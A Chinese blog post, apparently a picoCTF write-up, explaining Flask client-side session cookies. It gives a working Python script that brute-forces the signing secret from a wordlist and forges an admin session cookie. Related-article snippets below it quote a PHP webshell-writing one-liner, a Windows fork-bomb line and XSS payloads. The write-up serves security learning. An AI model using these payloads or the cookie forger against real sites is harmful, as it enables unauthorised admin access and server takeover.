2022/3/15 Flask-Session

最新推荐文章于 2024-03-06 19:40:15 发布
最新推荐文章于 2024-03-06 19:40:15 发布
阅读量492 收藏
点赞数 1
分类专栏: webctf 文章标签: flask python 后端 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51326092/article/details/123499029
版权

Flask-Session

客户端 session 导致的安全问题
p牛写的一篇文章

关于客户端session的介绍:

在传统PHP开发中,$_SESSION变量的内容默认会被保存在服务端的一个文件中,通过一个叫“PHPSESSID”的Cookie来区分用户。这类session是“服务端session”,用户看到的只是session的名称(一个随机字符串),其内容保存在服务端。

然而,并不是所有语言都有默认的session存储机制,也不是任何情况下我们都可以向服务器写入文件。所以,很多Web框架都会另辟蹊径,比如Django默认将session存储在数据库中,而对于flask这里并不包含数据库操作的框架,就只能将session存储在cookie中。

因为cookie实际上是存储在客户端(浏览器)中的,所以称之为“客户端session”。

题目来源: picoCTF
题解1
题解2
YOUTUBE大神讲解
flask-session工具
需要使用flask-unsign先跑出secretkey

相关payload:

import flask
import hashlib

from sys import argv
from flask.json.tag import TaggedJSONSerializer
from itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignature

cookie = argv[1]

cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", 
"shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", 
"biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", 
"wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", 
"lebkuchen", "macaron", "black and white", "white chocolate macadamia"]

real_secret = ''

for secret in cookie_names:
    try:
        serializer = URLSafeTimedSerializer(
            secret_key=secret,  
            salt='cookie-session',
            serializer=TaggedJSONSerializer(),
            signer=TimestampSigner,
            signer_kwargs={
                'key_derivation' : 'hmac',
                'digest_method' : hashlib.sha1
        }).loads(cookie)
    except BadSignature:
        continue

    print(f'Secret key: {secret}')
    real_secret = secret

session = {'very_auth' : 'admin'}

print(URLSafeTimedSerializer(
    secret_key=real_secret,
    salt='cookie-session',
    serializer=TaggedJSONSerializer(),
    signer=TimestampSigner,
    signer_kwargs={
        'key_derivation' : 'hmac',
        'digest_method' : hashlib.sha1
    }
).dumps(session))
Sakura-501
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
(二十四)Flask之flask-session组件
孤寒者的博客
03-11 2万+
(二十四)Flask之flask-session组件
flask-session-cookie-manager:Flask会话Cookie解码器
02-05
# pacman -S flask-session-cookie-manager{3,2} 吉特 ArchLinux 两者python3 etn python2: $ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager # ...
Flask入门三(Flask-session的使用、数据库链接池、wtforms、Flask定制命令、Flask-Cache、信号)
最新发布
Mchen的博客
03-06 492
Flask内置的Session会把数据加密后保存到浏览器 我们自己重写Session类保存到Reids中只需要重写open_session和save_session方法。而在这中间有一个模块就做了这件事,那就是flask-session,以把数据存放到文件、redis、mongodb、关系型数据库等中。每个人:线程用自己的从conn和cursor,在视图函数中,拿到链接和cursor。但是这种如果并发量过高,就会出现连接数过多的问题,mysql的性能就降低了。
CTFshow 2022 菜狗杯部分WEB WP
starttv的博客
11-13 1764
右键发现js源代码,将js代码全部复制下来,放在js在线运行工具里,在最后加上g1ve_flag();访问/secret_path_you_do_not_know/secretfile.txt。extract() 函数从数组中将变量导入到当前的符号表。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。该函数使用数组键名作为变量名,使用数组键值作为变量值。套娃题,自己本地搭环境,慢慢试就试出来了。可以实现任意文件下载,除了flag。把这里的修改即可得到flag。检查源代码发现存在文件下载。
flask使用中遇到的坑(一)--flask_session.Session与flask.session的冲突
lihengss的博客
04-30 3867
在flask项目中如果需要使用flask_session(flask内置的session,支持将session保存到多个地方)进行保存数据的同时,如果没有设置保存到的其他数据库比如redis,memcached,filesystem,mongodb,sqlalchmey时不可单独使用from flask import session 必须删除from flask_session import Se...
flask-session的安装及使用
一个滚烫且有趣的灵魂的博客
11-18 2431
说明:将session数据保存到服务器的解决方案。 安装:pip install flask-session 使用: from flask import Flask, session from flask_script import Manager from redis import Redis from flask_session import Session a...
flask-session-cookie-manager-master.zip
09-05
本项目“flask-session-cookie-manager-master.zip”显然是一款针对Flask Web框架的session管理工具,它专注于session的加密与解密。Flask是一个轻量级的Python Web服务器网关接口(WSGI)应用框架,广泛用于快速...
flask-session-cookie-manager
01-29
标题“flask-session-cookie-manager”指的是一个Python应用,它专门针对Flask框架,用于管理和操作session cookie。在Web开发中,session cookie是服务器用来跟踪用户状态的一种方式,特别是在无状态的HTTP协议上...
Flask之flask-session的具体使用
09-20
pip3 install flask-session ``` ### Redis存储 Redis是一种内存数据库,适用于高速数据存储。以下是如何配置Flask应用以使用Redis作为session存储: ```python import redis from flask import Flask, session ...
Flask Cookie和Session的使用
qq_43629857的博客
04-29 397
Cookie和Session
python函数登录验证_在Python的Flask框架中验证注册用户的Email的方法
weixin_39634052的博客
12-11 645
class User(db.Model):__tablename__ = "users"id = db.Column(db.Integer, primary_key=True)email = db.Column(db.String, unique=True, nullable=False)password = db.Column(db.String, nullable=False)register...
flask的session解读及flask_login登录过程研究
weixin_33758863的博客
09-07 302
    #!/usr/bin/env python # -*- coding: utf-8 -*- from itsdangerous import URLSafeTimedSerializer from flask.sessions import TaggedJSONSerializer import hashlib s=URLSafeTimedSerializer('some_random_...
flask表单验证的流程
鶸者为何战斗
12-28 3283
稍微看了一下flask form的验证源码 @app.route('/form', methods=['POST', 'GET']) def form(): form = EntriesForm()//1 if request.method == 'GET': return render_template('hello.html', form=form)
flask框架session存储有两种方式
wyq的博客
02-23 4651
session实现的原理: session是用来干什么的呢?由于http协议是一个无状态的协议,也就是说同一个用户第一次请求和第二次请求是完全没有关系的,但是现在的网站基本上有登录使用的功能,这就要求必须实现有状态,而session机制实现的就是这个功能。 用户第一次请求后,将产生的状态信息保存在session中,这时可以把session当做一个容器,它保存了正在使用的所有用户的状态信息;这段状态...
2022 寒假的一些学习记录
m0_51326092的博客
01-22 2620
2022 寒假的一些学习记录 @echo off %0 | %0 (windows循环批处理死机) <?php @eval(‘echo $_GET[x];’); ?>(可以执行系统命令) (写入一句话文件) <?php fputs(fopen(“shell.php”,w),’<?php @eval($_GET[cmd]);?>’); ?> data协议: data://text/plain,<?php phpinfo();?> data://text/plai
CTF8-XSS闯关 知识点:XSS,JavaScript
m0_51326092的博客
08-04 843
前言 今日心血来潮,把前几个星期发现的XSS闯关拿来玩了一下,发现自己是真的菜。。不过看了一些大佬的博客,还是学到了一些JS的语法和xss的绕过姿势的!!! 大佬博客: xss小游戏全通关-答案 test.ctf8 xss注入解题记录 Web安全测试学习笔记 - XSS靶场 - test.ctf8.com HTML实体字符转换 在线编码网站 解题payload: level1:?name=<script>alert(1);</script> level2:?keyword=" οnc
2021-07-19 [De1CTF 2019]SSRF Me 知识点:SSRF Flask MD5 local_file
m0_51326092的博客
07-19 671
111
2021-08-24 corCTF2021-devme 知识点:GraphQL,json
m0_51326092的博客
08-24 630
文章目录前言一、工具和使用网址二、具体payload总结 前言 最近去看了看国外的题目,给打蒙了,第一道最简单的不会做,唉o(╥﹏╥)o,是一道关于GraphQL的题目,以前完全没接触过啊,一开始找到了突破点,但是一直在burpsuit尝试,这是条错误的道路啊啊啊啊,后面才了解到需要GraphQL有自己的内省查询,可以使用它的工具,啊啊啊啊,活到老学到老。 一、工具和使用网址 Introspection-GraphQL 《解析 GraphQL 的查询语法》【译】 GraphiQL查询工具 YouTube
2021-7-30 [CISCN2019 华北赛区 Day1 Web2]ikun 知识点:逻辑漏洞,JWT伪造,python-pickle反序列化
m0_51326092的博客
08-03 605
文章目录前言前置知识一、JWT二、Python-pickle反序列化解题过程总结 前言 一开始看到kunkun,好家伙,做着做着发现这真是道难题,好你个姬霓太美,太菜了不得不去看大佬wp,才发现是我从未体验过得全新知识点,针不搓呢!!! 前置知识 参考大佬博客: https://www.cnblogs.com/Cl0ud/p/12177062.html 一、JWT JWT解码网站 Json Web Token详解 JWT破解工具 二、Python-pickle反序列化 解题过程 总结 ...
2021-7-22 [安洵杯 2019]easy_serialize_php 知识点:变量覆盖,php反序列化字符串逃逸
m0_51326092的博客
07-22 524
文章目录前言重要知识点变量覆盖:PHP序列化和反序列化解题过程总结 前言 本身是要在昨天解这题的,结果解着解着就去做了session反序列化的题目了o(╥﹏╥)o,于是昨天的题今天做(o)/~,这个知识点也是第一次遇到,菜菜的我学习到了,翻阅了很多大佬的博客才一知半解,需要继续努力!!! 重要知识点 变量覆盖: extract示例讲解网站 extract(): 作用: 从数组中将变量导入到当前的符号表;该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sakura-501

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值